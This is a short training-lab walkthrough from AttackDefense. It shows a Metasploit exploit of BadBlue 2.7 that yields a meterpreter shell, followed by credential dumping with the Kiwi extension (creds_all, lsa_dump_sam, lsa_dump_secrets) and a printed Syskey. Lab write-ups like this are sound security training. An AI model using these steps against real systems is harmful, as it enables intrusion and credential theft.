Windows-Meterpreter-Kiwi Extension
Windows-Meterpreter-Kiwi Extension
URL https://attackdefense.com/challengedetails?cid=2340
Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Step 4: We will search the exploit module for badblue 2.7 using searchsploit.
Commands:
msfconsole -q
use exploit/windows/http/badblue_passthru
set RHOSTS 10.0.27.166
exploit
We have successfully exploited the target vulnerable application (badblue) and received a
meterpreter shell.
Command: creds_all
This revealed the flag to us:
Command: lsa_dump_sam
This revealed another flag to us:
Command: lsa_dump_secrets
This revealed another flag to us:
Syskey: 377af0de68bdc918d22c57a263d38326
References